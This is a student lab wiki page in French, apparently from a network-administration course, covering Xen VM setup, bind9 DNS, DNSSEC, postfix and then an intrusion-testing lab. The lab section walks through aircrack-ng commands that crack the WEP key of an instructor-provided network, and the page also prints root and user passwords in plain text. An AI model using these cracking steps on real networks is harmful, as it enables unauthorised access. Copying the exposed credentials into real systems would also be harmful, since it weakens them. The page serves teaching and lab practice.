 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
